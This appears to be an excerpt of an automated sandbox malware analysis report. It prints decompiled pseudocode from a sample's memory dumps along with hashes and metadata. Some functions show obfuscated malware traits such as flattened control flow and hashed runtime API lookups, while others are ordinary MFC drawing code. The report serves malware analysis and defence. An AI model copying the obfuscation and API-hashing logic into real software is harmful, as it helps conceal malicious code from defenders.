                                            								break;
                                            							}
                                            							if(_t159 == 0) {
                                            								_t106 =  *0x227def8;
                                            								__eflags = _t106;
                                            								if(_t106 == 0) {
                                            									_t106 = E02273E80(_t104, E02273F20(0x667fdee), 0xb11f83b0, _t155);
                                            									 *0x227def8 = _t106;
                                            								}
                                            								_t63 =  *0x227e2e4; // 0x4d8ea8
                                            								 *_t106( *((intOrPtr*)(_t63 + 0x18)), 0, 0,  &_v124);
                                            								asm("sbb esi, esi");
                                            								_t150 = (_t150 & 0x258fd75b) + 0x8cf6762;
                                            								while(1) {
                                            									L1:
                                            									_t61 = _v140;
                                            									goto L2;
                                            								}
                                            							} else {
                                            								_t160 = _t150 - 0x13859baf;
                                            								if(_t160 > 0) {
                                            									__eflags = _t150 - 0x14926a00;
                                            									if(_t150 != 0x14926a00) {
                                            										goto L8;
                                            									} else {
                                            										_t69 =  *0x227e168;
                                            										__eflags = _t69;
                                            										if(_t69 == 0) {
                                            											_t69 = E02273E80(_t104, E02273F20(0x667fdee), 0xae646c41, _t155);
                                            											 *0x227e168 = _t69;
                                            										}
                                            										 *_t69(_v124);
                                            										_t150 = 0x8cf6762;
                                            										while(1) {
                                            											L1:
                                            											_t61 = _v140;
                                            											goto L2;
                                            										}
                                            									}
                                            								} else {
                                            									if(_t160 == 0) {
                                            										_t111 =  *0x227de98;
                                            										__eflags = _t111;
                                            										if(_t111 == 0) {
                                            											_t111 = E02273E80(_t104, E02273F20(0x667fdee), 0xe5edfdec, _t155);
                                            											_t61 = _v140;
                                            											 *0x227de98 = _t111;
                                            										}
                                            										_t72 =  *0x227e2e4; // 0x4d8ea8
                                            										 *_t111( *((intOrPtr*)(_t72 + 0x20)), _v124, 1, 0, _t61,  &_v120, _t155);
                                            										_t112 = _v164;
                                            										_t139 = _v160;
                                            										asm("sbb esi, esi");
                                            										_t150 = (_t150 & 0x0b40c3ab) + 0x14926a00;
                                            										while(1) {
                                            											L1:
                                            											_t61 = _v140;
                                            											goto L2;
                                            										}
                                            									} else {
                                            										if(_t150 == 0x3028e43) {
                                            											_t113 =  *0x227e060;
                                            											_v112 = 0x14;
                                            											__eflags = _t113;
                                            											if(_t113 == 0) {
                                            												_t113 = E02273E80(_t104, E02273F20(0x667fdee), 0xe39c7ccc, _t155);
                                            												 *0x227e060 = _t113;
                                            											}
                                            											_t79 =  *_t113(_v124, 2, _t104 + 0x60,  &_v112, 0);
                                            											_t112 = _v156;
                                            											__eflags = _t79;
                                            											_t61 = _v160;
                                            											_t139 = _v152;
                                            											if(_t79 != 0) {
                                            												_t150 = 0x14926a00;
                                            												_v148 = 1;
                                            												while(1) {
                                            													L1:
                                            													_t61 = _v140;
                                            													goto L2;
                                            												}
                                            											}
                                            											continue;
                                            										} else {
                                            											if(_t150 == 0x8cf6762) {
                                            												_t147 = _v128;
                                            												__eflags = _t147;
                                            												if(_t147 == 0) {
                                            													E02274250(_t104,  *_t139);
                                            												}
                                            												return _t147;
                                            											} else {
                                            												goto L8;
                                            											}
                                            										}
                                            									}
                                            								}
                                            							}
                                            							L51:
                                            						}
                                            						__eflags = _t150 - 0x2f4b92a8;
                                            						if(__eflags > 0) {
                                            							__eflags = _t150 - 0x3b18423d;
                                            							if(_t150 != 0x3b18423d) {
                                            								goto L8;
                                            							} else {
                                            								_t150 = 0x2f4b92a8;
                                            								goto L2;
                                            							}
                                            						} else {
                                            							if(__eflags == 0) {
                                            								_t85 = _t112[1] + 1;
                                            								__eflags = _t85 & 0x0000000f;
                                            								if((_t85 & 0x0000000f) != 0) {
                                            									_t85 = (_t85 & 0xfffffff0) + 0x10;
                                            									__eflags = _t85;
                                            								}
                                            								_t151 = _t85 + 0x74;
                                            								_t86 =  *0x227dea8;
                                            								_t139[1] = _t151;
                                            								__eflags = _t86;
                                            								if(_t86 == 0) {
                                            									_t86 = E02273E80(_t104, E02273F20(0xbb398380), 0x97f883e, _t155);
                                            									 *0x227dea8 = _t86;
                                            								}
                                            								_t148 =  *_t86();
                                            								_t88 =  *0x227dcec;
                                            								__eflags = _t88;
                                            								if(_t88 == 0) {
                                            									_t88 = E02273E80(_t104, E02273F20(0xbb398380), 0xe9233692, _t155);
                                            									 *0x227dcec = _t88;
                                            								}
                                            								_t89 =  *_t88(_t148, 8, _t151);
                                            								_t139 = _v144;
                                            								_t104 = _t89;
                                            								 *_t139 = _t104;
                                            								__eflags = _t104;
                                            								if(_t104 == 0) {
                                            									break;
                                            								} else {
                                            									_t53 = _t104 + 0x74; // 0x74
                                            									_t61 = _t53;
                                            									_t150 = 0x1c8b703e;
                                            									_v152 = _t61;
                                            									_t155 =  &_v116;
                                            									_v132 = _v148[1];
                                            									_t112 = _v148;
                                            									goto L2;
                                            								}
                                            							} else {
                                            								__eflags = _t150 - 0x1fd32dab;
                                            								if(_t150 == 0x1fd32dab) {
                                            									_t117 =  *0x227e0f8;
                                            									_v116 = 0x6c;
                                            									__eflags = _t117;
                                            									if(_t117 == 0) {
                                            										_t117 = E02273E80(_t104, E02273F20(0x667fdee), 0xd10d6746, _t155);
                                            										 *0x227e0f8 = _t117;
                                            									}
                                            									_t92 =  *0x227e2e4; // 0x4d8ea8
                                            									_t93 =  *_t117( *((intOrPtr*)(_t92 + 0x20)),  *((intOrPtr*)(_t92 + 0x1c)), 1, 0x40,  &_v108,  &_v116);
                                            									__eflags = _t93;
                                            									if(_t93 == 0) {
                                            										_t112 = _v160;
                                            										_t150 = 0x14926a00;
                                            										_t139 = _v156;
                                            										goto L1;
                                            									} else {
                                            										_t120 =  &_v25;
                                            										_t142 = _t104;
                                            										do {
                                            											_t142 = _t142 + 1;
                                            											 *((char*)(_t142 - 1)) =  *_t120;
                                            											_t120 = _t120 - 1;
                                            											__eflags = _t120 -  &_v120;
                                            										} while (_t120 >=  &_v120);
                                            										_t112 = _v160;
                                            										_t150 = 0x3028e43;
                                            										_t139 = _v156;
                                            										while(1) {
                                            											L1:
                                            											_t61 = _v140;
                                            											goto L2;
                                            										}
                                            									}
                                            								} else {
                                            									__eflags = _t150 - 0x2e5f3ebd;
                                            									if(_t150 != 0x2e5f3ebd) {
                                            										goto L8;
                                            									} else {
                                            										_t98 =  *0x227daac;
                                            										_t152 = _t112[1];
                                            										_t149 =  *_t112;
                                            										__eflags = _t98;
                                            										if(_t98 == 0) {
                                            											_t98 = E02273E80(_t104, E02273F20(0xe66945e6), 0x70f7b8ec, _t155);
                                            											 *0x227daac = _t98;
                                            										}
                                            										 *_t98(_v140, _t149, _t152);
                                            										_t112 = _v136;
                                            										_t157 =  &(_t157[3]);
                                            										_t139 = _v132;
                                            										_t150 = 0x13859baf;
                                            										while(1) {
                                            											L1:
                                            											_t61 = _v140;
                                            											goto L2;
                                            										}
                                            									}
                                            								}
                                            							}
                                            						}
                                            						goto L51;
                                            						L8:
                                            					} while (_t150 != 0xd360827);
                                            					return _v128;
                                            					goto L51;
                                            				}
                                            			}





















































                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true
                                            • Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2270000_sort.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: l$Ei
                                            • API String ID: 0-2145112675
                                            • Opcode ID: 05fb2767a39fa14ea4010ac182ebdcb8bb95c9518d9473e7689054bce0e7b3b0
                                            • Instruction ID: 0476b83d1c6e9ed964162ceb9f53c75d0fdb9338bb9acb3c8b18d1d0d2204893
                                            • Opcode Fuzzy Hash: 05fb2767a39fa14ea4010ac182ebdcb8bb95c9518d9473e7689054bce0e7b3b0
                                            • Instruction Fuzzy Hash: 1991A471A1C302DBD718DEA4D494B6BB7E2BB88304F054A5DE8559B358DB70DC098BD3
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 51%
                                            			E022729B0(intOrPtr __ecx, intOrPtr* __edx) {
                                            				char _v4;
                                            				char _v8;
                                            				intOrPtr _v12;
                                            				char _v16;
                                            				intOrPtr _v24;
                                            				intOrPtr _v32;
                                            				void* __ebx;
                                            				void* __ebp;
                                            				void* _t15;
                                            				intOrPtr* _t16;
                                            				intOrPtr* _t19;
                                            				intOrPtr* _t21;
                                            				intOrPtr* _t26;
                                            				intOrPtr* _t28;
                                            				intOrPtr _t29;
                                            				intOrPtr _t40;
                                            				intOrPtr _t50;
                                            				intOrPtr* _t60;
                                            				intOrPtr _t65;
                                            				intOrPtr _t66;
                                            				intOrPtr* _t67;
                                            				void* _t68;
                                            				void* _t69;
                                            				void* _t71;
                                            
                                            				_t40 = __ecx;
                                            				_t65 = 0;
                                            				_t67 = __edx;
                                            				_v12 = __ecx;
                                            				_t69 = 0;
                                            				_t15 = 0x191cc4d8;
                                            				goto L1;
                                            				do {
                                            					while(1) {
                                            						L1:
                                            						_t71 = _t15 - 0x217df346;
                                            						if(_t71 > 0) {
                                            							break;
                                            						}
                                            						if(_t71 == 0) {
                                            							if( *((intOrPtr*)(_t67 + 4)) >= _t65) {
                                            								goto L22;
                                            							}
                                            							_t15 = 0x8b7351;
                                            							continue;
                                            						}
                                            						if(_t15 == 0x8b7351) {
                                            							_t60 =  *0x227da90;
                                            							if(_t60 == 0) {
                                            								_t60 = E02273E80(_t40, E02273F20(0x2ba535f4), 0x824d1288, _t69);
                                            								 *0x227da90 = _t60;
                                            							}
                                            							_t69 =  *_t60(_t40,  *_t67 +  *((intOrPtr*)(_t67 + 4)), _t65 -  *((intOrPtr*)(_t67 + 4)),  &_v16);
                                            							if(_t69 == 0) {
                                            								L23:
                                            								_t19 =  *0x227dea8;
                                            								_t66 =  *_t67;
                                            								if(_t19 == 0) {
                                            									_t19 = E02273E80(_t40, E02273F20(0xbb398380), 0x97f883e, _t69);
                                            									 *0x227dea8 = _t19;
                                            								}
                                            								_t68 =  *_t19();
                                            								_t21 =  *0x227e1a0;
                                            								if(_t21 == 0) {
                                            									_t21 = E02273E80(_t40, E02273F20(0xbb398380), 0x26c3f343, _t69);
                                            									 *0x227e1a0 = _t21;
                                            								}
                                            								 *_t21(_t68, 0, _t66);
                                            								L28:
                                            								return _t69;
                                            							} else {
                                            								_t50 = _v32;
                                            								if(_t50 == 0) {
                                            									goto L22;
                                            								}
                                            								 *((intOrPtr*)(_t67 + 4)) =  *((intOrPtr*)(_t67 + 4)) + _t50;
                                            								_t15 = 0x217df346;
                                            								continue;
                                            							}
                                            						}
                                            						if(_t15 != 0x191cc4d8) {
                                            							goto L21;
                                            						}
                                            						_t15 = 0x2dfa6f2b;
                                            					}
                                            					if(_t15 == 0x2dfa6f2b) {
                                            						_t16 =  *0x227dde8;
                                            						_v8 = 4;
                                            						if(_t16 == 0) {
                                            							_t16 = E02273E80(_t40, E02273F20(0x2ba535f4), 0x46124712, _t69);
                                            							 *0x227dde8 = _t16;
                                            						}
                                            						_push(0);
                                            						_push( &_v8);
                                            						_push( &_v4);
                                            						_push(0x20000005);
                                            						_push(_t40);
                                            						if( *_t16() == 0) {
                                            							break;
                                            						}
                                            						_t65 = _v24;
                                            						if(_t65 == 0) {
                                            							break;
                                            						}
                                            						_t15 = 0x3b63bdd0;
                                            						goto L1;
                                            					}
                                            					if(_t15 != 0x3b63bdd0) {
                                            						goto L21;
                                            					}
                                            					_t26 =  *0x227dea8;
                                            					if(_t26 == 0) {
                                            						_t26 = E02273E80(_t40, E02273F20(0xbb398380), 0x97f883e, _t69);
                                            						 *0x227dea8 = _t26;
                                            					}
                                            					_t40 =  *_t26();
                                            					_t28 =  *0x227dcec;
                                            					if(_t28 == 0) {
                                            						_t28 = E02273E80(_t40, E02273F20(0xbb398380), 0xe9233692, _t69);
                                            						 *0x227dcec = _t28;
                                            					}
                                            					_t29 =  *_t28(_t40, 8, _t65);
                                            					 *_t67 = _t29;
                                            					if(_t29 == 0) {
                                            						break;
                                            					} else {
                                            						_t40 = _v24;
                                            						_t15 = 0x217df346;
                                            						 *((intOrPtr*)(_t67 + 4)) = 0;
                                            						goto L1;
                                            					}
                                            					L21:
                                            				} while (_t15 != 0x330be30a);
                                            				L22:
                                            				if(_t69 != 0) {
                                            					goto L28;
                                            				}
                                            				goto L23;
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true
                                            • Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2270000_sort.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7b94748a582d0895bb1e6692ee33f714e33d60d61a01c6137b8b61d1af30b73e
                                            • Instruction ID: d3ebd7af1cfc8f2354cdcad20f9cab622b3b92e634ab7d3ee7d25dceece784fc
                                            • Opcode Fuzzy Hash: 7b94748a582d0895bb1e6692ee33f714e33d60d61a01c6137b8b61d1af30b73e
                                            • Instruction Fuzzy Hash: 07418271B2C302DBDB34EEF9A89472B72EAEFD0244B14495DE845C7308EB74D8459B92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 88%
                                            			E00423382(intOrPtr __ecx) {
                                            				int _t231;
                                            				void* _t239;
                                            				int _t240;
                                            				void* _t260;
                                            				void* _t267;
                                            				void* _t268;
                                            				CHAR* _t280;
                                            				signed int _t336;
                                            				int _t392;
                                            				CHAR* _t407;
                                            				signed int _t408;
                                            				signed int _t409;
                                            				int _t420;
                                            				struct tagSIZE* _t421;
                                            				int _t428;
                                            				signed int _t437;
                                            				int _t442;
                                            				signed int _t446;
                                            				void* _t447;
                                            				int _t453;
                                            				void* _t456;
                                            				intOrPtr _t461;
                                            
                                            				E00406520(E0042A9E0, _t456);
                                            				_t461 =  *0x439c44; // 0x1
                                            				 *((intOrPtr*)(_t456 - 0x50)) = __ecx;
                                            				if(_t461 == 0) {
                                            					_push(__ecx);
                                            					E0041A41D(_t456 - 0x44, __eflags);
                                            					 *(_t456 - 4) = 0;
                                            					 *(_t456 - 0x30) = E00416528(__ecx);
                                            					GetWindowRect( *(__ecx + 0x1c), _t456 - 0x28);
                                            					OffsetRect(_t456 - 0x28,  ~( *(_t456 - 0x28)),  ~( *(_t456 - 0x24)));
                                            					 *((intOrPtr*)(_t456 - 0x48)) = 0;
                                            					 *((intOrPtr*)(_t456 - 0x4c)) = 0x42d72c;
                                            					 *(_t456 - 4) = 1;
                                            					E0041A611(_t456 - 0x4c, CreateSolidBrush(GetSysColor(6)));
                                            					 *(_t456 - 0x5c) =  *(_t456 - 0x5c) & 0x00000000;
                                            					 *((intOrPtr*)(_t456 - 0x60)) = 0x42d72c;
                                            					 *(_t456 - 4) = 2;
                                            					asm("sbb eax, eax");
                                            					E0041A611(_t456 - 0x60, CreateSolidBrush(GetSysColor( ~( *( *((intOrPtr*)(_t456 - 0x50)) + 0xc4)) + 0xb)));
                                            					 *(_t456 - 0x54) =  *(_t456 - 0x54) & 0x00000000;
                                            					 *(_t456 - 0x58) = 0x42d72c;
                                            					 *(_t456 - 4) = 3;
                                            					asm("sbb eax, eax");
                                            					E0041A611(_t456 - 0x58, CreateSolidBrush(GetSysColor( ~( *( *((intOrPtr*)(_t456 - 0x50)) + 0xc4)) + 3)));
                                            					 *(_t456 - 0x10) = GetSystemMetrics(6);
                                            					 *(_t456 - 0x14) = GetSystemMetrics(5);
                                            					_t428 = GetSystemMetrics(0x21);
                                            					_t231 = GetSystemMetrics(0x20);
                                            					__eflags =  *(_t456 - 0x30) & 0x00040600;
                                            					_t442 = _t231;
                                            					if(( *(_t456 - 0x30) & 0x00040600) != 0) {
                                            						E004232C5(_t456 - 0x44, _t456 - 0x28,  *(_t456 - 0x14),  *(_t456 - 0x10), _t456 - 0x4c);
                                            						InflateRect(_t456 - 0x28,  ~( *(_t456 - 0x14)),  ~( *(_t456 - 0x10)));
                                            						E004232C5(_t456 - 0x44, _t456 - 0x28, _t442 -  *(_t456 - 0x14), _t428 -  *(_t456 - 0x10), _t456 - 0x60);
                                            						_t407 =  &(( *(_t456 - 0x10))[ *(_t456 - 0x10)]);
                                            						 *(_t456 - 0x74) = _t407;
                                            						_t408 =  *(_t456 - 0x14);
                                            						 *(_t456 - 0x18) = _t428 - _t407;
                                            						_t336 = _t442 - _t408 + _t408;
                                            						__eflags =  *(_t456 - 0x2f) & 0x00000002;
                                            						 *(_t456 - 0x2c) = _t336;
                                            						if(( *(_t456 - 0x2f) & 0x00000002) != 0) {
                                            							_t409 =  *(_t456 - 0x18);
                                            						} else {
                                            							_t436 = _t428 -  *(_t456 - 0x74) +  *0x439c9c;
                                            							_t455 = _t442 - _t408 + _t408 * 2 +  *0x439c98;
                                            							E00423F5E(_t456 - 0x44,  *(_t456 - 0x28),  *(_t456 - 0x24) + _t428 -  *(_t456 - 0x74) +  *0x439c9c, _t336, 1, 0);
                                            							E00423F5E(_t456 - 0x44,  *(_t456 - 0x28),  *((intOrPtr*)(_t456 - 0x1c)) - _t428 -  *(_t456 - 0x74) +  *0x439c9c,  *(_t456 - 0x2c), 1, 0);
                                            							E00423F5E(_t456 - 0x44,  *((intOrPtr*)(_t456 - 0x20)) -  *(_t456 - 0x2c),  *(_t456 - 0x24) + _t428 -  *(_t456 - 0x74) +  *0x439c9c,  *(_t456 - 0x2c), 1, 0);
                                            							E00423F5E(_t456 - 0x44,  *((intOrPtr*)(_t456 - 0x20)) -  *(_t456 - 0x2c),  *((intOrPtr*)(_t456 - 0x1c)) - _t436,  *(_t456 - 0x2c), 1, 0);
                                            							_t437 =  *(_t456 - 0x18);
                                            							E00423F5E(_t456 - 0x44,  *(_t456 - 0x28) + _t442 - _t408 + _t408 * 2 +  *0x439c98,  *(_t456 - 0x24), 1, _t437, 0);
                                            							E00423F5E(_t456 - 0x44,  *((intOrPtr*)(_t456 - 0x20)) - _t442 - _t408 + _t408 * 2 +  *0x439c98,  *(_t456 - 0x24), 1, _t437, 0);
                                            							E00423F5E(_t456 - 0x44,  *(_t456 - 0x28) + _t442 - _t408 + _t408 * 2 +  *0x439c98,  *((intOrPtr*)(_t456 - 0x1c)) - _t437, 1, _t437, 0);
                                            							E00423F5E(_t456 - 0x44,  *((intOrPtr*)(_t456 - 0x20)) - _t455,  *((intOrPtr*)(_t456 - 0x1c)) - _t437, 1, _t437, 0);
                                            							_t336 =  *(_t456 - 0x2c);
                                            							_t409 = _t437;
                                            						}
                                            						InflateRect(_t456 - 0x28,  ~_t336,  ~_t409);
                                            					}
                                            					__eflags =  *(_t456 - 0x2e) & 0x000000c0;
                                            					if(( *(_t456 - 0x2e) & 0x000000c0) == 0) {
                                            						E004232C5(_t456 - 0x44, _t456 - 0x28,  *(_t456 - 0x14),  *(_t456 - 0x10), _t456 - 0x4c);
                                            						goto L25;
                                            					} else {
                                            						asm("movsd");
                                            						asm("movsd");
                                            						_t240 =  *0x439c9c; // 0x0
                                            						asm("movsd");
                                            						asm("movsd");
                                            						_t446 =  *(_t456 - 0x10);
                                            						 *(_t456 - 0x64) = _t240 + _t446 +  *(_t456 - 0x24);
                                            						E004232C5(_t456 - 0x44, _t456 - 0x70,  *(_t456 - 0x14), _t446, _t456 - 0x4c);
                                            						InflateRect(_t456 - 0x70,  ~( *(_t456 - 0x14)),  ~_t446);
                                            						asm("sbb eax, eax");
                                            						FillRect( *(_t456 - 0x40), _t456 - 0x70,  ~(_t456 - 0x58) &  *(_t456 - 0x54));
                                            						E004232C5(_t456 - 0x44, _t456 - 0x28,  *(_t456 - 0x14), _t446, _t456 - 0x4c);
                                            						_t260 =  *0x439ca0; // 0x0
                                            						__eflags = _t260;
                                            						if(_t260 != 0) {
                                            							 *(_t456 - 0x18) = SelectObject( *(_t456 - 0x40), _t260);
                                            							_t280 =  *0x436980; // 0x436994
                                            							 *(_t456 - 0x10) = _t280;
                                            							 *(_t456 - 4) = 4;
                                            							E004140EE( *((intOrPtr*)(_t456 - 0x50)), _t456 - 0x10);
                                            							_t421 = _t456 - 0x78;
                                            							asm("sbb esi, esi");
                                            							_t453 = ( ~( *(_t456 - 0x30) & 0x00080000) &  *0x439c98) +  *(_t456 - 0x70);
                                            							GetTextExtentPoint32A( *(_t456 - 0x3c),  *(_t456 - 0x10),  *( *(_t456 - 0x10) - 8), _t421);
                                            							__eflags =  *(_t456 - 0x78) -  *((intOrPtr*)(_t456 - 0x68)) -  *(_t456 - 0x70);
                                            							if( *(_t456 - 0x78) <=  *((intOrPtr*)(_t456 - 0x68)) -  *(_t456 - 0x70)) {
                                            								E0041A240(_t456 - 0x44, 6);
                                            								asm("cdq");
                                            								_t453 = _t453 + ( *((intOrPtr*)(_t456 - 0x68)) - _t453 - _t421 >> 1);
                                            								__eflags = _t453;
                                            							}
                                            							GetTextMetricsA( *(_t456 - 0x3c), _t456 - 0xb8);
                                            							InflateRect(_t456 - 0x70, 0, 1);
                                            							asm("cdq");
                                            							asm("sbb eax, eax");
                                            							E00419E62(GetSysColor(( ~( *( *((intOrPtr*)(_t456 - 0x50)) + 0xc4)) & 0x000000f6) + 0x13), _t456 - 0x44, _t302);
                                            							E00419DAA(_t456 - 0x44, 1);
                                            							ExtTextOutA( *(_t456 - 0x40), _t453,  *((intOrPtr*)(_t456 - 0x6c)) + ( *(_t456 - 0x64) -  *((intOrPtr*)(_t456 - 0xac)) +  *((intOrPtr*)(_t456 - 0xb0)) +  *((intOrPtr*)(_t456 - 0xb4)) -  *((intOrPtr*)(_t456 - 0x6c)) + 1 - _t421 >> 1), 4, _t456 - 0x70,  *(_t456 - 0x10),  *( *(_t456 - 0x10) - 8), 0);
                                            							__eflags =  *(_t456 - 0x18);
                                            							if( *(_t456 - 0x18) != 0) {
                                            								SelectObject( *(_t456 - 0x40),  *(_t456 - 0x18));
                                            							}
                                            							 *(_t456 - 4) = 3;
                                            							E00416AEC(_t456 - 0x10);
                                            						}
                                            						__eflags =  *(_t456 - 0x2e) & 0x00000008;
                                            						if(( *(_t456 - 0x2e) & 0x00000008) == 0) {
                                            							L23:
                                            							 *(_t456 - 0x24) =  *(_t456 - 0x64);
                                            							L25:
                                            							 *(_t456 - 0x58) = 0x42cb14;
                                            							 *(_t456 - 4) = 9;
                                            							E0041A668(_t456 - 0x58);
                                            							 *((intOrPtr*)(_t456 - 0x60)) = 0x42cb14;
                                            							 *(_t456 - 4) = 0xa;
                                            							E0041A668(_t456 - 0x60);
                                            							 *((intOrPtr*)(_t456 - 0x4c)) = 0x42cb14;
                                            							 *(_t456 - 4) = 0xb;
                                            						} else {
                                            							E00419B00(_t456 - 0x80);
                                            							 *(_t456 - 4) = 5;
                                            							asm("sbb eax, eax");
                                            							_t267 = E00419BB7(_t456 - 0x80, CreateCompatibleDC( ~(_t456 - 0x44) &  *(_t456 - 0x40)));
                                            							__eflags = _t267;
                                            							if(_t267 != 0) {
                                            								_t268 =  *0x439ca4; // 0x0
                                            								__eflags = _t268;
                                            								if(_t268 == 0) {
                                            									_t447 = 0;
                                            									__eflags = 0;
                                            								} else {
                                            									_t447 = SelectObject( *(_t456 - 0x7c), _t268);
                                            								}
                                            								_t392 =  *0x439c9c; // 0x0
                                            								_t420 =  *0x439c98; // 0x0
                                            								asm("sbb eax, eax");
                                            								BitBlt( *(_t456 - 0x40),  *(_t456 - 0x28),  *(_t456 - 0x24), _t420, _t392,  ~(_t456 - 0x80) &  *(_t456 - 0x7c), 0, 0, 0xcc0020);
                                            								__eflags = _t447;
                                            								if(_t447 != 0) {
                                            									SelectObject( *(_t456 - 0x7c), _t447);
                                            								}
                                            								 *(_t456 - 4) = 3;
                                            								E00419C1F(_t456 - 0x80);
                                            								goto L23;
                                            							} else {
                                            								 *(_t456 - 4) = 3;
                                            								E00419C1F(_t456 - 0x80);
                                            								 *(_t456 - 0x58) = 0x42cb14;
                                            								 *(_t456 - 4) = 6;
                                            								E0041A668(_t456 - 0x58);
                                            								 *((intOrPtr*)(_t456 - 0x60)) = 0x42cb14;
                                            								 *(_t456 - 4) = 7;
                                            								E0041A668(_t456 - 0x60);
                                            								 *((intOrPtr*)(_t456 - 0x4c)) = 0x42cb14;
                                            								 *(_t456 - 4) = 8;
                                            							}
                                            						}
                                            					}
                                            					E0041A668(_t456 - 0x4c);
                                            					_t197 = _t456 - 4;
                                            					 *_t197 =  *(_t456 - 4) | 0xffffffff;
                                            					__eflags =  *_t197;
                                            					_t239 = E0041A48F(_t456 - 0x44);
                                            				} else {
                                            					_t239 = E004136A7(__ecx);
                                            				}
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t456 - 0xc));
                                            				return _t239;
                                            			}

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: MetricsSystem$BrushColorCreateRectSolid$H_prologInflateOffsetWindow
                                            • String ID:
                                            • API String ID: 1266645593-0
                                            • Opcode ID: 827b8b6824deef71f215e530bef12f339db5eb1673a232190c9b8040d827e70b
                                            • Instruction ID: 63fa9e6fd2119b7c539c7c0ae66551d555764ff581325622ef96e7efc3e9d792
                                            • Opcode Fuzzy Hash: 827b8b6824deef71f215e530bef12f339db5eb1673a232190c9b8040d827e70b
                                            • Instruction Fuzzy Hash: 1A022871E00219ABCF11DFE4DD89EEEBBB9EF08704F14411AE505B7290DB78AA45CB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 90%
                                            			E004139FC(void* __edx, void* _a4, int _a8, long _a12) {
                                            				intOrPtr _v8;
                                            				signed int _v12;
                                            				char _v20;
                                            				void* __ebp;
                                            				intOrPtr _t50;
                                            				signed int _t52;
                                            				long _t53;
                                            				long _t62;
                                            				long _t70;
                                            				char _t71;
                                            				long _t73;
                                            				CHAR* _t76;
                                            				int _t83;
                                            				signed char _t92;
                                            				void* _t93;
                                            				void* _t95;
                                            				long _t96;
                                            				intOrPtr _t99;
                                            				intOrPtr* _t101;
                                            				intOrPtr _t102;
                                            				CHAR* _t104;
                                            				long _t105;
                                            
                                            				_t93 = __edx;
                                            				_t50 = E00425C92(0x4397cc, E0042440D);
                                            				_v8 = _t50;
                                            				if(_a4 != 3) {
                                            					return CallNextHookEx( *(_t50 + 0x2c), _a4, _a8, _a12);
                                            				}
                                            				_t101 =  *((intOrPtr*)(_t50 + 0x14));
                                            				_t95 =  *_a12;
                                            				_t52 =  *(E00424BFB() + 0x14) & 0x000000ff;
                                            				_t83 = _a8;
                                            				_v12 = _t52;
                                            				if(_t101 != 0 || ( *(_t95 + 0x23) & 0x00000040) == 0 && _t52 == 0) {
                                            					if( *0x439c54 == 0) {
                                            						L10:
                                            						if(_t101 == 0) {
                                            							_t53 = GetWindowLongA(_t83, 0xfffffffc);
                                            							_a4 = _t53;
                                            							if(_t53 != 0) {
                                            								_t104 = "AfxOldWndProc423";
                                            								if(GetPropA(_t83, _t104) == 0) {
                                            									SetPropA(_t83, _t104, _a4);
                                            									if(GetPropA(_t83, _t104) == _a4) {
                                            										GlobalAddAtomA(_t104);
                                            										_t62 = E00413980;
                                            										if( *((intOrPtr*)(_v8 + 0x28)) == 0) {
                                            											_t62 = E00413821;
                                            										}
                                            										SetWindowLongA(_t83, 0xfffffffc, _t62);
                                            									}
                                            								}
                                            							}
                                            							goto L27;
                                            						}
                                            						E00413785(_t101, _t83);
                                            						 *((intOrPtr*)( *_t101 + 0x50))();
                                            						_a8 =  *((intOrPtr*)( *_t101 + 0x80))();
                                            						if( *0x439c3c != 0 || _v12 != 0) {
                                            							L18:
                                            							_t105 = E0041381B();
                                            							_t70 = SetWindowLongA(_t83, 0xfffffffc, _t105);
                                            							if(_t70 == _t105) {
                                            								goto L20;
                                            							}
                                            							goto L19;
                                            						} else {
                                            							_t99 =  *0x439c50; // 0x4c3588
                                            							if(_t99 == 0 ||  *((intOrPtr*)(_t99 + 0x20)) == 0) {
                                            								goto L18;
                                            							} else {
                                            								_push(0);
                                            								_push(0);
                                            								_push(0x36f);
                                            								_push(_t83);
                                            								_push(_t101);
                                            								_t71 = E0041357F(_t93);
                                            								_v20 = _t71;
                                            								if(_t71 == 0) {
                                            									goto L18;
                                            								}
                                            								_a4 = E0041381B();
                                            								_t73 = GetWindowLongA(_t83, 0xfffffffc);
                                            								asm("sbb esi, esi");
                                            								 *((intOrPtr*)(_t99 + 0x20))(_t83, _v20);
                                            								if( ~(_t73 - _a4) + 1 != 0) {
                                            									L20:
                                            									_t102 = _v8;
                                            									 *(_t102 + 0x14) =  *(_t102 + 0x14) & 0x00000000;
                                            									goto L28;
                                            								}
                                            								_t70 = SetWindowLongA(_t83, 0xfffffffc, _a4);
                                            								L19:
                                            								 *_a8 = _t70;
                                            								goto L20;
                                            							}
                                            						}
                                            					}
